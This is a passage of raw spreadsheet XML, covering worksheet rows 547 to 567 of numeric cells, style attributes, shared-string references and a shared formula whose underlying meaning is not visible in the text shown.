      <c r="U547" s="5"/>
      <c r="V547" s="5"/>
      <c r="W547" s="47"/>
      <c r="X547" s="45"/>
      <c r="Y547" s="45"/>
      <c r="Z547" s="38" t="s">
        <v>2678</v>
      </c>
      <c r="AA547" s="39" t="s">
        <v>2679</v>
      </c>
      <c r="AB547" s="38" t="s">
        <v>2680</v>
      </c>
      <c r="AC547" s="40">
        <v>149830.0</v>
      </c>
      <c r="AD547" s="5"/>
      <c r="AE547" s="14"/>
      <c r="AF547" s="14"/>
    </row>
    <row r="548">
      <c r="A548" s="6">
        <f t="shared" si="1"/>
        <v>0.4349120223</v>
      </c>
      <c r="B548" s="29">
        <v>1.0</v>
      </c>
      <c r="C548" s="15"/>
      <c r="D548" s="14"/>
      <c r="E548" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F548" s="14"/>
      <c r="G548" s="29">
        <v>15.0</v>
      </c>
      <c r="H548" s="29">
        <v>5124.0</v>
      </c>
      <c r="I548" s="29">
        <v>50144.0</v>
      </c>
      <c r="J548" s="15"/>
      <c r="K548" s="29">
        <v>8562.0</v>
      </c>
      <c r="L548" s="15"/>
      <c r="M548" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N548" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O548" s="29">
        <v>2.0</v>
      </c>
      <c r="P548" s="29">
        <v>0.0</v>
      </c>
      <c r="Q548" s="15"/>
      <c r="R548" s="15"/>
      <c r="S548" s="15"/>
      <c r="T548" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U548" s="5"/>
      <c r="V548" s="5"/>
      <c r="W548" s="47"/>
      <c r="X548" s="45"/>
      <c r="Y548" s="45"/>
      <c r="Z548" s="38" t="s">
        <v>2681</v>
      </c>
      <c r="AA548" s="39" t="s">
        <v>2682</v>
      </c>
      <c r="AB548" s="38" t="s">
        <v>2683</v>
      </c>
      <c r="AC548" s="40">
        <v>110927.0</v>
      </c>
      <c r="AD548" s="5"/>
      <c r="AE548" s="14"/>
      <c r="AF548" s="14"/>
    </row>
    <row r="549">
      <c r="A549" s="6">
        <f t="shared" si="1"/>
        <v>0.8269532604</v>
      </c>
      <c r="B549" s="29">
        <v>1.0</v>
      </c>
      <c r="C549" s="15"/>
      <c r="D549" s="14"/>
      <c r="E549" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F549" s="14"/>
      <c r="G549" s="29">
        <v>3.0</v>
      </c>
      <c r="H549" s="29">
        <v>230.0</v>
      </c>
      <c r="I549" s="29">
        <v>275195.0</v>
      </c>
      <c r="J549" s="15"/>
      <c r="K549" s="29">
        <v>37315.0</v>
      </c>
      <c r="L549" s="15"/>
      <c r="M549" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N549" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O549" s="29">
        <v>2.0</v>
      </c>
      <c r="P549" s="29">
        <v>1.0</v>
      </c>
      <c r="Q549" s="15"/>
      <c r="R549" s="15"/>
      <c r="S549" s="15"/>
      <c r="T549" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U549" s="5"/>
      <c r="V549" s="5"/>
      <c r="W549" s="47"/>
      <c r="X549" s="45"/>
      <c r="Y549" s="45"/>
      <c r="Z549" s="38" t="s">
        <v>2684</v>
      </c>
      <c r="AA549" s="39" t="s">
        <v>2685</v>
      </c>
      <c r="AB549" s="38" t="s">
        <v>2686</v>
      </c>
      <c r="AC549" s="40">
        <v>260067.0</v>
      </c>
      <c r="AD549" s="5"/>
      <c r="AE549" s="14"/>
      <c r="AF549" s="14"/>
    </row>
    <row r="550">
      <c r="A550" s="6">
        <f t="shared" si="1"/>
        <v>0.04489966202</v>
      </c>
      <c r="B550" s="29">
        <v>1.0</v>
      </c>
      <c r="C550" s="29">
        <v>221675.0</v>
      </c>
      <c r="D550" s="14"/>
      <c r="E550" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F550" s="14"/>
      <c r="G550" s="29">
        <v>8.0</v>
      </c>
      <c r="H550" s="29">
        <v>8908.0</v>
      </c>
      <c r="I550" s="29">
        <v>192875.0</v>
      </c>
      <c r="J550" s="15"/>
      <c r="K550" s="15"/>
      <c r="L550" s="15"/>
      <c r="M550" s="15"/>
      <c r="N550" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O550" s="29">
        <v>3.0</v>
      </c>
      <c r="P550" s="29">
        <v>5.0</v>
      </c>
      <c r="Q550" s="15"/>
      <c r="R550" s="15"/>
      <c r="S550" s="15"/>
      <c r="T550" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U550" s="5"/>
      <c r="V550" s="5"/>
      <c r="W550" s="47"/>
      <c r="X550" s="45"/>
      <c r="Y550" s="45"/>
      <c r="Z550" s="38" t="s">
        <v>2687</v>
      </c>
      <c r="AA550" s="39" t="s">
        <v>2688</v>
      </c>
      <c r="AB550" s="38" t="s">
        <v>1304</v>
      </c>
      <c r="AC550" s="40">
        <v>221672.0</v>
      </c>
      <c r="AD550" s="5"/>
      <c r="AE550" s="14"/>
      <c r="AF550" s="14"/>
    </row>
    <row r="551">
      <c r="A551" s="6">
        <f t="shared" si="1"/>
        <v>0.5672598055</v>
      </c>
      <c r="B551" s="29">
        <v>1.0</v>
      </c>
      <c r="C551" s="14"/>
      <c r="D551" s="14"/>
      <c r="E551" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F551" s="14"/>
      <c r="G551" s="29">
        <v>5.0</v>
      </c>
      <c r="H551" s="29">
        <v>5091.0</v>
      </c>
      <c r="I551" s="29">
        <v>16685.0</v>
      </c>
      <c r="J551" s="5" t="s">
        <v>2689</v>
      </c>
      <c r="K551" s="29">
        <v>16685.0</v>
      </c>
      <c r="L551" s="15"/>
      <c r="M551" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N551" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O551" s="29">
        <v>3.0</v>
      </c>
      <c r="P551" s="29">
        <v>0.0</v>
      </c>
      <c r="Q551" s="15"/>
      <c r="R551" s="15"/>
      <c r="S551" s="15"/>
      <c r="T551" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U551" s="5"/>
      <c r="V551" s="5"/>
      <c r="W551" s="47"/>
      <c r="X551" s="45"/>
      <c r="Y551" s="45"/>
      <c r="Z551" s="38" t="s">
        <v>2690</v>
      </c>
      <c r="AA551" s="39" t="s">
        <v>2691</v>
      </c>
      <c r="AB551" s="38" t="s">
        <v>2692</v>
      </c>
      <c r="AC551" s="40">
        <v>37792.0</v>
      </c>
      <c r="AD551" s="5"/>
      <c r="AE551" s="14"/>
      <c r="AF551" s="14"/>
    </row>
    <row r="552">
      <c r="A552" s="6">
        <f t="shared" si="1"/>
        <v>0.3924719595</v>
      </c>
      <c r="B552" s="29">
        <v>1.0</v>
      </c>
      <c r="C552" s="15"/>
      <c r="D552" s="14"/>
      <c r="E552" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F552" s="14"/>
      <c r="G552" s="29">
        <v>4.0</v>
      </c>
      <c r="H552" s="29">
        <v>135.0</v>
      </c>
      <c r="I552" s="15"/>
      <c r="J552" s="5" t="s">
        <v>2693</v>
      </c>
      <c r="K552" s="29">
        <v>98538.0</v>
      </c>
      <c r="L552" s="15"/>
      <c r="M552" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N552" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O552" s="29">
        <v>1.0</v>
      </c>
      <c r="P552" s="29">
        <v>0.0</v>
      </c>
      <c r="Q552" s="15"/>
      <c r="R552" s="15"/>
      <c r="S552" s="15"/>
      <c r="T552" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U552" s="5"/>
      <c r="V552" s="5"/>
      <c r="W552" s="47"/>
      <c r="X552" s="45"/>
      <c r="Y552" s="45"/>
      <c r="Z552" s="38" t="s">
        <v>2694</v>
      </c>
      <c r="AA552" s="39" t="s">
        <v>2695</v>
      </c>
      <c r="AB552" s="38" t="s">
        <v>2696</v>
      </c>
      <c r="AC552" s="40">
        <v>182893.0</v>
      </c>
      <c r="AD552" s="5"/>
      <c r="AE552" s="14"/>
      <c r="AF552" s="14"/>
    </row>
    <row r="553">
      <c r="A553" s="6">
        <f t="shared" si="1"/>
        <v>0.9773754973</v>
      </c>
      <c r="B553" s="29">
        <v>1.0</v>
      </c>
      <c r="C553" s="15"/>
      <c r="D553" s="14"/>
      <c r="E553" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F553" s="14"/>
      <c r="G553" s="29">
        <v>1.0</v>
      </c>
      <c r="H553" s="29">
        <v>755.0</v>
      </c>
      <c r="I553" s="29">
        <v>78238.0</v>
      </c>
      <c r="J553" s="15"/>
      <c r="K553" s="29">
        <v>65990.0</v>
      </c>
      <c r="L553" s="15"/>
      <c r="M553" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N553" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O553" s="29">
        <v>0.0</v>
      </c>
      <c r="P553" s="29">
        <v>1.0</v>
      </c>
      <c r="Q553" s="15"/>
      <c r="R553" s="15"/>
      <c r="S553" s="15"/>
      <c r="T553" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U553" s="5"/>
      <c r="V553" s="5"/>
      <c r="W553" s="47"/>
      <c r="X553" s="45"/>
      <c r="Y553" s="45"/>
      <c r="Z553" s="38" t="s">
        <v>2697</v>
      </c>
      <c r="AA553" s="39" t="s">
        <v>2698</v>
      </c>
      <c r="AB553" s="38" t="s">
        <v>2699</v>
      </c>
      <c r="AC553" s="40">
        <v>92527.0</v>
      </c>
      <c r="AD553" s="5"/>
      <c r="AE553" s="14"/>
      <c r="AF553" s="14"/>
    </row>
    <row r="554">
      <c r="A554" s="6">
        <f t="shared" si="1"/>
        <v>0.7895085176</v>
      </c>
      <c r="B554" s="29">
        <v>1.0</v>
      </c>
      <c r="C554" s="29">
        <v>20774.0</v>
      </c>
      <c r="D554" s="14"/>
      <c r="E554" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F554" s="14"/>
      <c r="G554" s="29">
        <v>0.0</v>
      </c>
      <c r="H554" s="29">
        <v>993.0</v>
      </c>
      <c r="I554" s="29">
        <v>21272.0</v>
      </c>
      <c r="J554" s="15"/>
      <c r="K554" s="29">
        <v>6253.0</v>
      </c>
      <c r="L554" s="15"/>
      <c r="M554" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N554" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O554" s="29">
        <v>1.0</v>
      </c>
      <c r="P554" s="29">
        <v>2.0</v>
      </c>
      <c r="Q554" s="15"/>
      <c r="R554" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S554" s="15"/>
      <c r="T554" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U554" s="5"/>
      <c r="V554" s="5"/>
      <c r="W554" s="47"/>
      <c r="X554" s="45"/>
      <c r="Y554" s="45"/>
      <c r="Z554" s="38" t="s">
        <v>2700</v>
      </c>
      <c r="AA554" s="39" t="s">
        <v>2701</v>
      </c>
      <c r="AB554" s="38" t="s">
        <v>2702</v>
      </c>
      <c r="AC554" s="40">
        <v>20732.0</v>
      </c>
      <c r="AD554" s="5"/>
      <c r="AE554" s="14"/>
      <c r="AF554" s="14"/>
    </row>
    <row r="555">
      <c r="A555" s="6">
        <f t="shared" si="1"/>
        <v>0.7861772164</v>
      </c>
      <c r="B555" s="29">
        <v>1.0</v>
      </c>
      <c r="C555" s="29">
        <v>264304.0</v>
      </c>
      <c r="D555" s="14"/>
      <c r="E555" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F555" s="14"/>
      <c r="G555" s="29">
        <v>3.0</v>
      </c>
      <c r="H555" s="29">
        <v>326.0</v>
      </c>
      <c r="I555" s="29">
        <v>163295.0</v>
      </c>
      <c r="J555" s="15"/>
      <c r="K555" s="29">
        <v>125461.0</v>
      </c>
      <c r="L555" s="15"/>
      <c r="M555" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N555" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O555" s="29">
        <v>1.0</v>
      </c>
      <c r="P555" s="29">
        <v>0.0</v>
      </c>
      <c r="Q555" s="15"/>
      <c r="R555" s="15"/>
      <c r="S555" s="15"/>
      <c r="T555" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U555" s="5"/>
      <c r="V555" s="5"/>
      <c r="W555" s="47"/>
      <c r="X555" s="45"/>
      <c r="Y555" s="45"/>
      <c r="Z555" s="38" t="s">
        <v>2703</v>
      </c>
      <c r="AA555" s="39" t="s">
        <v>2704</v>
      </c>
      <c r="AB555" s="38" t="s">
        <v>2705</v>
      </c>
      <c r="AC555" s="40">
        <v>264300.0</v>
      </c>
      <c r="AD555" s="5"/>
      <c r="AE555" s="14"/>
      <c r="AF555" s="14"/>
    </row>
    <row r="556">
      <c r="A556" s="6">
        <f t="shared" si="1"/>
        <v>0.847423423</v>
      </c>
      <c r="B556" s="29">
        <v>1.0</v>
      </c>
      <c r="C556" s="29">
        <v>218616.0</v>
      </c>
      <c r="D556" s="14"/>
      <c r="E556" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F556" s="14"/>
      <c r="G556" s="29">
        <v>2.0</v>
      </c>
      <c r="H556" s="29">
        <v>179.0</v>
      </c>
      <c r="I556" s="29">
        <v>214669.0</v>
      </c>
      <c r="J556" s="15"/>
      <c r="K556" s="15"/>
      <c r="L556" s="15"/>
      <c r="M556" s="14"/>
      <c r="N556" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O556" s="29">
        <v>1.0</v>
      </c>
      <c r="P556" s="29">
        <v>2.0</v>
      </c>
      <c r="Q556" s="15"/>
      <c r="R556" s="15"/>
      <c r="S556" s="15"/>
      <c r="T556" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U556" s="5"/>
      <c r="V556" s="5"/>
      <c r="W556" s="47"/>
      <c r="X556" s="45"/>
      <c r="Y556" s="45"/>
      <c r="Z556" s="38" t="s">
        <v>2706</v>
      </c>
      <c r="AA556" s="39" t="s">
        <v>2707</v>
      </c>
      <c r="AB556" s="38" t="s">
        <v>2708</v>
      </c>
      <c r="AC556" s="40">
        <v>218311.0</v>
      </c>
      <c r="AD556" s="5"/>
      <c r="AE556" s="14"/>
      <c r="AF556" s="14"/>
    </row>
    <row r="557">
      <c r="A557" s="6">
        <f t="shared" si="1"/>
        <v>0.3250747539</v>
      </c>
      <c r="B557" s="29">
        <v>1.0</v>
      </c>
      <c r="C557" s="15"/>
      <c r="D557" s="14"/>
      <c r="E557" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F557" s="14"/>
      <c r="G557" s="29">
        <v>1.0</v>
      </c>
      <c r="H557" s="29">
        <v>134.0</v>
      </c>
      <c r="I557" s="29">
        <v>176424.0</v>
      </c>
      <c r="J557" s="15"/>
      <c r="K557" s="15"/>
      <c r="L557" s="15"/>
      <c r="M557" s="15"/>
      <c r="N557" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O557" s="29">
        <v>0.0</v>
      </c>
      <c r="P557" s="29">
        <v>4.0</v>
      </c>
      <c r="Q557" s="15"/>
      <c r="R557" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S557" s="15"/>
      <c r="T557" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U557" s="5"/>
      <c r="V557" s="5"/>
      <c r="W557" s="47"/>
      <c r="X557" s="45"/>
      <c r="Y557" s="45"/>
      <c r="Z557" s="38" t="s">
        <v>2709</v>
      </c>
      <c r="AA557" s="39" t="s">
        <v>2710</v>
      </c>
      <c r="AB557" s="38" t="s">
        <v>1468</v>
      </c>
      <c r="AC557" s="40">
        <v>200070.0</v>
      </c>
      <c r="AD557" s="5"/>
      <c r="AE557" s="14"/>
      <c r="AF557" s="14"/>
    </row>
    <row r="558">
      <c r="A558" s="6">
        <f t="shared" si="1"/>
        <v>0.3951312717</v>
      </c>
      <c r="B558" s="29">
        <v>1.0</v>
      </c>
      <c r="C558" s="29">
        <v>45781.0</v>
      </c>
      <c r="D558" s="14"/>
      <c r="E558" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F558" s="14"/>
      <c r="G558" s="29">
        <v>2.0</v>
      </c>
      <c r="H558" s="29">
        <v>269.0</v>
      </c>
      <c r="I558" s="29">
        <v>34133.0</v>
      </c>
      <c r="J558" s="15"/>
      <c r="K558" s="15"/>
      <c r="L558" s="15"/>
      <c r="M558" s="14"/>
      <c r="N558" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O558" s="29">
        <v>3.0</v>
      </c>
      <c r="P558" s="29">
        <v>0.0</v>
      </c>
      <c r="Q558" s="15"/>
      <c r="R558" s="15"/>
      <c r="S558" s="15"/>
      <c r="T558" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U558" s="5"/>
      <c r="V558" s="5"/>
      <c r="W558" s="47"/>
      <c r="X558" s="45"/>
      <c r="Y558" s="45"/>
      <c r="Z558" s="38" t="s">
        <v>2711</v>
      </c>
      <c r="AA558" s="39" t="s">
        <v>2712</v>
      </c>
      <c r="AB558" s="38" t="s">
        <v>2713</v>
      </c>
      <c r="AC558" s="40">
        <v>45779.0</v>
      </c>
      <c r="AD558" s="5"/>
      <c r="AE558" s="14"/>
      <c r="AF558" s="14"/>
    </row>
    <row r="559">
      <c r="A559" s="6">
        <f t="shared" si="1"/>
        <v>0.5537308943</v>
      </c>
      <c r="B559" s="29">
        <v>1.0</v>
      </c>
      <c r="C559" s="29">
        <v>182856.0</v>
      </c>
      <c r="D559" s="14"/>
      <c r="E559" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F559" s="14"/>
      <c r="G559" s="29">
        <v>4.0</v>
      </c>
      <c r="H559" s="29">
        <v>1764.0</v>
      </c>
      <c r="I559" s="29">
        <v>128016.0</v>
      </c>
      <c r="J559" s="15"/>
      <c r="K559" s="29">
        <v>86741.0</v>
      </c>
      <c r="L559" s="15"/>
      <c r="M559" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N559" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O559" s="29">
        <v>1.0</v>
      </c>
      <c r="P559" s="29">
        <v>4.0</v>
      </c>
      <c r="Q559" s="15"/>
      <c r="R559" s="15"/>
      <c r="S559" s="15"/>
      <c r="T559" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U559" s="5"/>
      <c r="V559" s="5"/>
      <c r="W559" s="47"/>
      <c r="X559" s="45"/>
      <c r="Y559" s="45"/>
      <c r="Z559" s="38" t="s">
        <v>2714</v>
      </c>
      <c r="AA559" s="39" t="s">
        <v>2715</v>
      </c>
      <c r="AB559" s="38" t="s">
        <v>2716</v>
      </c>
      <c r="AC559" s="40">
        <v>182841.0</v>
      </c>
      <c r="AD559" s="5"/>
      <c r="AE559" s="14"/>
      <c r="AF559" s="14"/>
    </row>
    <row r="560">
      <c r="A560" s="6">
        <f t="shared" si="1"/>
        <v>0.9036301196</v>
      </c>
      <c r="B560" s="29">
        <v>1.0</v>
      </c>
      <c r="C560" s="29">
        <v>187645.0</v>
      </c>
      <c r="D560" s="14"/>
      <c r="E560" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F560" s="14"/>
      <c r="G560" s="29">
        <v>1.0</v>
      </c>
      <c r="H560" s="29">
        <v>559.0</v>
      </c>
      <c r="I560" s="15"/>
      <c r="J560" s="5" t="s">
        <v>2717</v>
      </c>
      <c r="K560" s="15"/>
      <c r="L560" s="14"/>
      <c r="M560" s="15"/>
      <c r="N560" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O560" s="29">
        <v>1.0</v>
      </c>
      <c r="P560" s="29">
        <v>0.0</v>
      </c>
      <c r="Q560" s="15"/>
      <c r="R560" s="15"/>
      <c r="S560" s="15"/>
      <c r="T560" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U560" s="5"/>
      <c r="V560" s="5"/>
      <c r="W560" s="47"/>
      <c r="X560" s="45"/>
      <c r="Y560" s="45"/>
      <c r="Z560" s="38" t="s">
        <v>2718</v>
      </c>
      <c r="AA560" s="39" t="s">
        <v>2719</v>
      </c>
      <c r="AB560" s="38" t="s">
        <v>2720</v>
      </c>
      <c r="AC560" s="40">
        <v>187605.0</v>
      </c>
      <c r="AD560" s="5"/>
      <c r="AE560" s="14"/>
      <c r="AF560" s="14"/>
    </row>
    <row r="561">
      <c r="A561" s="6">
        <f t="shared" si="1"/>
        <v>0.06437822376</v>
      </c>
      <c r="B561" s="29">
        <v>1.0</v>
      </c>
      <c r="C561" s="14"/>
      <c r="D561" s="14"/>
      <c r="E561" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F561" s="14"/>
      <c r="G561" s="29">
        <v>1.0</v>
      </c>
      <c r="H561" s="29">
        <v>832.0</v>
      </c>
      <c r="I561" s="29">
        <v>37050.0</v>
      </c>
      <c r="J561" s="15"/>
      <c r="K561" s="29">
        <v>37050.0</v>
      </c>
      <c r="L561" s="15"/>
      <c r="M561" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N561" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O561" s="29">
        <v>0.0</v>
      </c>
      <c r="P561" s="29">
        <v>4.0</v>
      </c>
      <c r="Q561" s="15"/>
      <c r="R561" s="15"/>
      <c r="S561" s="15"/>
      <c r="T561" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U561" s="5"/>
      <c r="V561" s="5"/>
      <c r="W561" s="47"/>
      <c r="X561" s="45"/>
      <c r="Y561" s="45"/>
      <c r="Z561" s="38" t="s">
        <v>2721</v>
      </c>
      <c r="AA561" s="39" t="s">
        <v>2722</v>
      </c>
      <c r="AB561" s="38" t="s">
        <v>2723</v>
      </c>
      <c r="AC561" s="40">
        <v>53221.0</v>
      </c>
      <c r="AD561" s="5"/>
      <c r="AE561" s="14"/>
      <c r="AF561" s="14"/>
    </row>
    <row r="562">
      <c r="A562" s="6">
        <f t="shared" si="1"/>
        <v>0.4651815981</v>
      </c>
      <c r="B562" s="29">
        <v>1.0</v>
      </c>
      <c r="C562" s="29">
        <v>25719.0</v>
      </c>
      <c r="D562" s="14"/>
      <c r="E562" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F562" s="14"/>
      <c r="G562" s="29">
        <v>7.0</v>
      </c>
      <c r="H562" s="29">
        <v>6521.0</v>
      </c>
      <c r="I562" s="29">
        <v>8335.0</v>
      </c>
      <c r="J562" s="15"/>
      <c r="K562" s="29">
        <v>-1.0</v>
      </c>
      <c r="L562" s="15"/>
      <c r="M562" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N562" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O562" s="29">
        <v>2.0</v>
      </c>
      <c r="P562" s="29">
        <v>1.0</v>
      </c>
      <c r="Q562" s="15"/>
      <c r="R562" s="15"/>
      <c r="S562" s="15"/>
      <c r="T562" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U562" s="5"/>
      <c r="V562" s="5"/>
      <c r="W562" s="47"/>
      <c r="X562" s="45"/>
      <c r="Y562" s="45"/>
      <c r="Z562" s="38" t="s">
        <v>2724</v>
      </c>
      <c r="AA562" s="39" t="s">
        <v>2725</v>
      </c>
      <c r="AB562" s="38" t="s">
        <v>2726</v>
      </c>
      <c r="AC562" s="40">
        <v>25681.0</v>
      </c>
      <c r="AD562" s="5"/>
      <c r="AE562" s="14"/>
      <c r="AF562" s="14"/>
    </row>
    <row r="563">
      <c r="A563" s="6">
        <f t="shared" si="1"/>
        <v>0.4303491361</v>
      </c>
      <c r="B563" s="29">
        <v>1.0</v>
      </c>
      <c r="C563" s="29">
        <v>137822.0</v>
      </c>
      <c r="D563" s="14"/>
      <c r="E563" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F563" s="14"/>
      <c r="G563" s="29">
        <v>0.0</v>
      </c>
      <c r="H563" s="29">
        <v>1198.0</v>
      </c>
      <c r="I563" s="29">
        <v>90916.0</v>
      </c>
      <c r="J563" s="15"/>
      <c r="K563" s="29">
        <v>-1.0</v>
      </c>
      <c r="L563" s="15"/>
      <c r="M563" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N563" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O563" s="29">
        <v>1.0</v>
      </c>
      <c r="P563" s="29">
        <v>1.0</v>
      </c>
      <c r="Q563" s="15"/>
      <c r="R563" s="15"/>
      <c r="S563" s="15"/>
      <c r="T563" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U563" s="5"/>
      <c r="V563" s="5"/>
      <c r="W563" s="47"/>
      <c r="X563" s="45"/>
      <c r="Y563" s="45"/>
      <c r="Z563" s="38" t="s">
        <v>2727</v>
      </c>
      <c r="AA563" s="39" t="s">
        <v>2728</v>
      </c>
      <c r="AB563" s="38" t="s">
        <v>2729</v>
      </c>
      <c r="AC563" s="40">
        <v>137821.0</v>
      </c>
      <c r="AD563" s="5"/>
      <c r="AE563" s="14"/>
      <c r="AF563" s="14"/>
    </row>
    <row r="564">
      <c r="A564" s="6">
        <f t="shared" si="1"/>
        <v>0.1939491587</v>
      </c>
      <c r="B564" s="29">
        <v>1.0</v>
      </c>
      <c r="C564" s="29">
        <v>251247.0</v>
      </c>
      <c r="D564" s="14"/>
      <c r="E564" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F564" s="14"/>
      <c r="G564" s="29">
        <v>1.0</v>
      </c>
      <c r="H564" s="29">
        <v>115.0</v>
      </c>
      <c r="I564" s="29">
        <v>226212.0</v>
      </c>
      <c r="J564" s="15"/>
      <c r="K564" s="29">
        <v>226212.0</v>
      </c>
      <c r="L564" s="15"/>
      <c r="M564" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N564" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O564" s="29">
        <v>2.0</v>
      </c>
      <c r="P564" s="29">
        <v>0.0</v>
      </c>
      <c r="Q564" s="15"/>
      <c r="R564" s="15"/>
      <c r="S564" s="15"/>
      <c r="T564" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U564" s="5"/>
      <c r="V564" s="5"/>
      <c r="W564" s="47"/>
      <c r="X564" s="45"/>
      <c r="Y564" s="45"/>
      <c r="Z564" s="38" t="s">
        <v>2730</v>
      </c>
      <c r="AA564" s="39" t="s">
        <v>2731</v>
      </c>
      <c r="AB564" s="38" t="s">
        <v>2732</v>
      </c>
      <c r="AC564" s="40">
        <v>251244.0</v>
      </c>
      <c r="AD564" s="5"/>
      <c r="AE564" s="14"/>
      <c r="AF564" s="14"/>
    </row>
    <row r="565">
      <c r="A565" s="6">
        <f t="shared" si="1"/>
        <v>0.58493424</v>
      </c>
      <c r="B565" s="29">
        <v>1.0</v>
      </c>
      <c r="C565" s="15"/>
      <c r="D565" s="14"/>
      <c r="E565" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F565" s="14"/>
      <c r="G565" s="29">
        <v>26.0</v>
      </c>
      <c r="H565" s="29">
        <v>6540.0</v>
      </c>
      <c r="I565" s="29">
        <v>6350.0</v>
      </c>
      <c r="J565" s="15"/>
      <c r="K565" s="29">
        <v>6350.0</v>
      </c>
      <c r="L565" s="15"/>
      <c r="M565" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N565" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O565" s="29">
        <v>6.0</v>
      </c>
      <c r="P565" s="29">
        <v>16.0</v>
      </c>
      <c r="Q565" s="15"/>
      <c r="R565" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S565" s="15"/>
      <c r="T565" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U565" s="5"/>
      <c r="V565" s="5"/>
      <c r="W565" s="47"/>
      <c r="X565" s="45"/>
      <c r="Y565" s="45"/>
      <c r="Z565" s="38" t="s">
        <v>2733</v>
      </c>
      <c r="AA565" s="39" t="s">
        <v>2734</v>
      </c>
      <c r="AB565" s="38" t="s">
        <v>2735</v>
      </c>
      <c r="AC565" s="40">
        <v>231286.0</v>
      </c>
      <c r="AD565" s="5"/>
      <c r="AE565" s="14"/>
      <c r="AF565" s="14"/>
    </row>
    <row r="566">
      <c r="A566" s="6">
        <f t="shared" si="1"/>
        <v>0.04591107378</v>
      </c>
      <c r="B566" s="29">
        <v>1.0</v>
      </c>
      <c r="C566" s="29">
        <v>151357.0</v>
      </c>
      <c r="D566" s="14"/>
      <c r="E566" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F566" s="14"/>
      <c r="G566" s="29">
        <v>3.0</v>
      </c>
      <c r="H566" s="29">
        <v>197.0</v>
      </c>
      <c r="I566" s="29">
        <v>72031.0</v>
      </c>
      <c r="J566" s="15"/>
      <c r="K566" s="15"/>
      <c r="L566" s="14"/>
      <c r="M566" s="15"/>
      <c r="N566" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O566" s="29">
        <v>1.0</v>
      </c>
      <c r="P566" s="29">
        <v>0.0</v>
      </c>
      <c r="Q566" s="15"/>
      <c r="R566" s="15"/>
      <c r="S566" s="15"/>
      <c r="T566" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U566" s="5"/>
      <c r="V566" s="5"/>
      <c r="W566" s="47"/>
      <c r="X566" s="45"/>
      <c r="Y566" s="45"/>
      <c r="Z566" s="38" t="s">
        <v>2736</v>
      </c>
      <c r="AA566" s="39" t="s">
        <v>2737</v>
      </c>
      <c r="AB566" s="38" t="s">
        <v>2738</v>
      </c>
      <c r="AC566" s="40">
        <v>151348.0</v>
      </c>
      <c r="AD566" s="5"/>
      <c r="AE566" s="14"/>
      <c r="AF566" s="14"/>
    </row>
    <row r="567">
      <c r="A567" s="6">
        <f t="shared" si="1"/>
        <v>0.9110734903</v>
      </c>
      <c r="B567" s="29">
        <v>1.0</v>
      </c>
      <c r="C567" s="29">
        <v>193174.0</v>
      </c>
      <c r="D567" s="14"/>
      <c r="E567" s="36" t="s">
        <v>30</v>
      </c>
